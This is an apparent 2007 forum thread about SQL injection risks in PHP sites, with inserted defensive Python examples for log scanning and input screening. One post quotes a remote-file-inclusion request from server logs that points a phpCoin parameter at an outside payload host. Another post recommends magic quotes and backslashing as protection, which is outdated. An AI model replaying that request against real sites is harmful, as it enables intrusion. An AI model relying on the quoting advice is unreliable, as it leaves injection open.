  1. #1
    Comfortably Numb John Powell's Avatar
    Join Date
    October 17th, 2005
    Location
    Bayou Country, LA
    Posts
    3,432
    SQL Injection Exploit
    I have followed Steve Gibson for quite some time. I was mostly interested in his PC security information. He has a good test for your firewall and other neat stuff.

    Today he caught my attention with
    Security Now! Episode 87:
    SQL Injection Exploits
    Leo and I wrap up our three-part series on web-based code injection vulnerabilities and exploitation with a discussion of web-based structured query language (SQL) database attacks. We explain why and how SQL injection vulnerabilities are creating an ongoing plague of vulnerabilities besetting modern 'Web 2.0' applications.
    There is a link to the audio version or the html version.

    I must like to have extra stuff to worry about.

  2. #2
    general fuq mrbshouse's Avatar
    Join Date
    January 18th, 2005
    Location
    Argieville
    Posts
    1,381
    Bumpaw,

    Thanks for raising the flag! Anyone that is running prescripted code like coppermine and many others will want to do some research on this. I used the html version and found the topic about 3/4 the way down the page. (remove url if need be grc.com/sn/SN-087.htm )

    Anyone that is running their own apache server might be able to head it ALL off at the pass with some modifications to mod_security. Looks like I have a new more important project for the night :-(

    back to learning more...
    Last edited by Leader; April 19th, 2007 at 09:04 PM. Reason: Got rid of icon that was unintentionally showing up

  3. #3
    general fuq mrbshouse's Avatar
    Join Date
    January 18th, 2005
    Location
    Argieville
    Posts
    1,381
    Leader,

    unintended but worked for me ;-)


    Bumpaw I can't thank you enough for pointing this out. I always knew this was something I needed to know more about, but I had no idea what I was looking at in the logs until tonight.

    After doing a bit of learning on this I was shocked how easy SQL can be used to exploit the servers, so I went into my logs and sent no less than 10 hack abuse letters to servers across the globe. If you see any URLs in your logs that refer to another site such as

    //phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=http://www.come~get~my~virusDOTno/stephan/templates/namibia_css/freeman.txt?
    someone is knocking at your door....how will you answer?

    If you are using SQL/mySQL and php at all you need to pay attention!
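
A check for the log pattern described in the post above, as an added example that is not part of the original thread: it flags requests in which a query-string parameter's value is itself a URL on another host. The log lines are constructed, and `OWN_HOSTS`, `URL_PARAMS_OK` and the function name are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl

# Assumptions for this example: the host names this server answers for, and
# the (path, parameter) pairs that are supposed to carry a URL.
OWN_HOSTS = {"www.mysite.example"}
URL_PARAMS_OK = {("/out.php", "to")}

# Constructed sample lines in Apache combined log format; all hosts are placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Apr/2007:21:04:11 -0500] "GET /gallery/index.php?cat=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [19/Apr/2007:21:05:40 -0500] "GET //phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=http://files.example.net/a/b.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
203.0.113.7 - - [19/Apr/2007:21:06:02 -0500] "GET /out.php?to=http%3A%2F%2Fshop.example.org%2F HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.99 - - [19/Apr/2007:21:07:15 -0500] "GET /index.php?page=ftp://files.example.net/x.txt HTTP/1.0" 200 880 "-" "-"
203.0.113.7 - - [19/Apr/2007:21:08:30 -0500] "GET /view.php?img=http://www.mysite.example/a.png HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_RE = re.compile(r"^(?:https?|ftp)://([^/:?#]+)", re.IGNORECASE)


def find_remote_url_params(log_text):
    """Return (client, path, parameter, remote_host) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # Split by hand: a target starting with "//" would be misread as a
        # host name by urlsplit().
        path, _, query = target.partition("?")
        path = re.sub(r"/{2,}", "/", path)
        # parse_qsl also decodes %3A%2F%2F, so percent-encoded URLs are caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            remote = REMOTE_RE.match(value.strip())
            if not remote:
                continue
            host = remote.group(1).lower()
            if host in OWN_HOSTS or (path, name) in URL_PARAMS_OK:
                continue
            hits.append((client, path, name, host))
    return hits


if __name__ == "__main__":
    for hit in find_remote_url_params(SAMPLE_LOG):
        print(*hit, sep="\t")
```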

  4. #4
    Comfortably Numb John Powell's Avatar
    Join Date
    October 17th, 2005
    Location
    Bayou Country, LA
    Posts
    3,432
    There is a nice article entitled "The scary part of online retailing: Hackers are easily finding the unlocked doors" in the April issue of Internet Retailer. They talk a lot about SQL Injection and then further down say:
    Looking at other e-commerce security trends, we expect the wildly popular PHP open-source programming language to continue to provide a bounty of opportunities for hackers.
    I really enjoy that magazine. I have been getting it for free for months, and I'm not sure what I did for that. Seems like I went on their site and signed up for a trial, but it sure has gone long.

  5. #5
    ABW Ambassador Snib's Avatar
    Join Date
    January 18th, 2005
    Location
    Virginia
    Posts
    5,303
    Yes, SQL injection is very serious and many of us are vulnerable already. It's important to always use quotes in your queries and backslash the quotes in user submitted content. If you're inserting a number, quote it anyway to be safe. It's also a good idea to screen the data that comes through to make sure you're getting valid inputs. Just because you've got a select box it doesn't mean somebody won't try to enter a value you didn't provide. To be on the safe side you should enable magic quotes so any user submitted content is automatically backslashed. But even then you need to be aware of the potential problem and keep it in mind when taking content from users.

    And I agree, Internet Retailer is great!

    - Scott
    Hatred stirs up strife, But love covers all transgressions.
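
The input screening described in the post above, as an added example that is not part of the original thread: a select-box value and a numeric field are checked against what the form actually offers, and the query receives them as bound parameters, which is a different technique from the quoting and backslashing the post describes. It uses Python's `sqlite3` so that it runs stand-alone; the table, column and function names are assumptions.

```python
import re
import sqlite3

# Assumption: the options the form's select box actually offers.
ALLOWED_CATEGORIES = {"books", "music", "toys"}


def make_db():
    """Build a small in-memory catalogue (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, category TEXT, name TEXT)")
    db.executemany(
        "INSERT INTO products (category, name) VALUES (?, ?)",
        [("books", "Atlas"), ("music", "Blues CD"), ("toys", "Kite"), ("books", "Almanac")],
    )
    return db


def screen_category(raw):
    """Accept only a value the select box offers."""
    if raw not in ALLOWED_CATEGORIES:
        raise ValueError("category not offered by the form")
    return raw


def screen_id(raw):
    """Accept only a short run of ASCII digits and return it as an int."""
    if not re.fullmatch(r"[0-9]{1,9}", raw):
        raise ValueError("id is not a number")
    return int(raw)


def names_in_category(db, raw_category):
    category = screen_category(raw_category)
    rows = db.execute("SELECT name FROM products WHERE category = ? ORDER BY id", (category,))
    return [r[0] for r in rows]


def name_by_id(db, raw_id):
    row = db.execute("SELECT name FROM products WHERE id = ?", (screen_id(raw_id),)).fetchone()
    return row[0] if row else None


def bound_without_screening(db, raw_category):
    # Even with no screening, a bound value is compared as data, never parsed as SQL.
    rows = db.execute("SELECT name FROM products WHERE category = ?", (raw_category,))
    return [r[0] for r in rows]
```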

  6. #6
    Resident Genius and Staunch Capitalist Leader's Avatar
    Join Date
    January 18th, 2005
    Location
    Florida
    Posts
    12,817
    Leader,

    unintended but worked for me ;-)
    I actually had a motive for changing it: I had forgotten just what keyword brought up that little bottle, so I couldn't tell what you were trying to say until I disabled it ;)

    "prescriptioned" code just didn't make sense! :p
    There is no knowledge that is not power. ~Hemingway

  7. #7
    CPA Network Rep adFinityJoe's Avatar
    Join Date
    March 25th, 2007
    Location
    Southern California
    Posts
    230
    It's good to see that this issue is still getting coverage. SQL programmers on PHP or ASP need to keep addressing this issue, because the hackers sure haven't forgotten.
